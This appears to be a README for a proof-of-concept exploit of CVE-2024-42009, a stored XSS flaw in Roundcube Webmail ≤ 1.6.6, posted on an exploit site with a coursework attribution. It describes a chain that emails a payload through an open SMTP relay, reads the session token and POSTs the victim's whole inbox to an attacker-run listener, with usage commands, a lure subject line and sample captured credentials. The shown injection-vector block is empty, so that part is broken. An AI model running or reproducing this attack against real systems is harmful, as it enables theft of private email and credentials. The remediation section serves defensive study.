Exploit for Cross-site Scripting in Roundcube Webmail CVE-2024-42009

## https://sploitus.com/exploit?id=38CC0676-948A-5269-9162-8B92F853D747
# CVE-2024-42009 — Roundcube Webmail 1.6.6 Stored XSS PoC

> **For authorised security testing, CTF environments, and educational research only.**  
> Using this tool against systems you do not own or have written permission to test is illegal under the Computer Misuse Act 1990 (UK), the CFAA (US), and equivalent laws worldwide.

---

## Vulnerability Summary

| Field | Detail |
|-------|--------|
| CVE | CVE-2024-42009 |
| Affected Software | Roundcube Webmail ≤ 1.6.6 |
| Patched Version | 1.6.7 / 1.6.8 |
| CVSS v3.1 Score | 8.8 (High) |
| CVSS Vector | AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N |
| CWE | CWE-79 — Improper Neutralisation of Input During Web Page Generation (XSS) |
| Attack Type | Stored XSS → Zero-click email exfiltration |
| Authentication Required | None (SMTP delivery); Low (victim must open the email) |

---

## How It Works

Roundcube 1.6.6's HTML sanitiser fails to strip JavaScript event handlers attached to CSS animation keyframes within a malformed `` tag attribute.

**Injection vector:**

```html
@keyframes x { from { opacity: 1; } to { opacity: 1; } }

```

When the victim opens the email in their authenticated Roundcube session, the CSS animation fires immediately. The `onanimationstart` handler executes with full access to the `rcmail` JavaScript object, including the session's `request_token`.

**Exploit chain:**

```
1. Attacker sends malicious HTML email to victim via unauthenticated SMTP relay (port 25)
2. Victim opens email in Roundcube — animation fires, JS executes (zero clicks required)
3. JS reads rcmail.env.request_token (valid CSRF token for the session)
4. JS iterates all inbox UIDs via Roundcube's internal mail API
5. Each message is fetched and its content collected
6. All inbox data is POSTed as JSON to the attacker's HTTP listener
7. Attacker reads recovered emails — may contain credentials, session data, or sensitive communications
```

---

## Repository Structure

```
cve-2024-42009-roundcube-xss/
├── exploit.py       # Sends the XSS payload via unauthenticated SMTP
├── listener.py      # CORS-capable HTTP server; receives and prints exfiltrated inbox data
├── payload.html     # Standalone XSS payload for manual inspection or Burp delivery
└── README.md
```

---

## Requirements

- Python 3.7+
- No external dependencies (stdlib only: `smtplib`, `http.server`, `json`, `argparse`)
- Target must be running Roundcube ≤ 1.6.6
- Target SMTP server must allow unauthenticated relay on port 25 (common in lab environments)

---

## Usage

### Step 1 — Start the listener (on your attacker machine)

```bash
python3 listener.py --port 8080
```

Output when data arrives:

```
[+] Exfiltration received from 192.168.62.128
[*] Session token : abc123...
[*] Emails captured: 19

  --- Email 1 ---
  UID     : 1
  From    : admin@target.local
  Subject : SSH Access Credentials
  Body    : Your credentials are: ...
```

The full JSON dump is saved automatically to `exfil_dump.json`.

### Step 2 — Deliver the payload

```bash
python3 exploit.py \
  --smtp 192.168.62.128 \
  --port 25 \
  --from attacker@evil.local \
  --to victim@target.local \
  --attacker 192.168.62.129 \
  --lport 8080 \
  --subject "Security Advisory - Action Required"
```

| Argument | Description |
|----------|-------------|
| `--smtp` | IP or hostname of the target SMTP server |
| `--port` | SMTP port (default: 25) |
| `--from` | Sender address (any value accepted by the relay) |
| `--to` | Victim's email address |
| `--attacker` | Your IP — embedded in the payload as the exfil collector |
| `--lport` | Your listener port (default: 8080) |
| `--subject` | Email subject line |

### Step 3 — Wait for the victim to open the email

Once the email is opened in Roundcube ≤ 1.6.6, the listener will print the exfiltrated inbox contents.

---

## Why This Works (Technical Detail)

Roundcube's HTML purifier is responsible for stripping dangerous attributes before rendering incoming email HTML. In versions ≤ 1.6.6, the purifier correctly strips `onclick`, `onerror`, and similar handlers — but does **not** strip event handlers on CSS animation events (`onanimationstart`, `onanimationend`, `onanimationiteration`).

Because CSS animations fire as part of rendering (not user interaction), the handler executes the moment the email is opened — no link click, no user action beyond opening the message.

The `rcmail` JavaScript object is globally accessible in every authenticated Roundcube session. It exposes `rcmail.env.request_token`, which is the session's CSRF token. Combined with Roundcube's own mail API endpoints (`?_task=mail&_action=list`, `?_action=show`), the payload can read the full inbox without triggering additional authentication.

---

## Affected Versions

| Version | Status |
|---------|--------|
| ≤ 1.6.6 | Vulnerable |
| 1.6.7   | Patched |
| 1.6.8   | Patched (recommended) |
| 1.5.x LTS | Check vendor advisory |

---

## Remediation

| Action | Detail |
|--------|--------|
| **Upgrade** | Roundcube 1.6.8 or later patches this class of XSS |
| **CSP header** | Deploy `Content-Security-Policy: default-src 'self'; script-src 'self'` on the webmail vhost to block inline JS execution |
| **SMTP relay** | Disable unauthenticated relay on port 25 — require AUTH for all internal delivery |

---

## References

- [Roundcube Security Advisory](https://roundcube.net/news/2024/08/04/security-update-1.6.8-released)
- [NVD — CVE-2024-42009](https://nvd.nist.gov/vuln/detail/CVE-2024-42009)
- [OWASP Top 10 A03 — Injection](https://owasp.org/Top10/A03_2021-Injection/)

---

## Discovered / Demonstrated By

This PoC was developed and tested as part of a Boot-to-Root CTF penetration testing assessment in the **Ethical Hacking and Penetration Testing** module, MSc Cybersecurity, Coventry University (2025–2026). All testing was conducted in an isolated VMware lab environment with explicit written authorisation.

Author: **Segun Akinsoyinu**  
Portfolio: [segunakinsoyinu.github.io/MyPortfolio](https://segunakinsoyinu.github.io/MyPortfolio)

---

## Legal Notice

This code is released for **educational and authorised security research purposes only**. The author accepts no liability for misuse. Before using this tool, confirm you have explicit written authorisation to test the target system.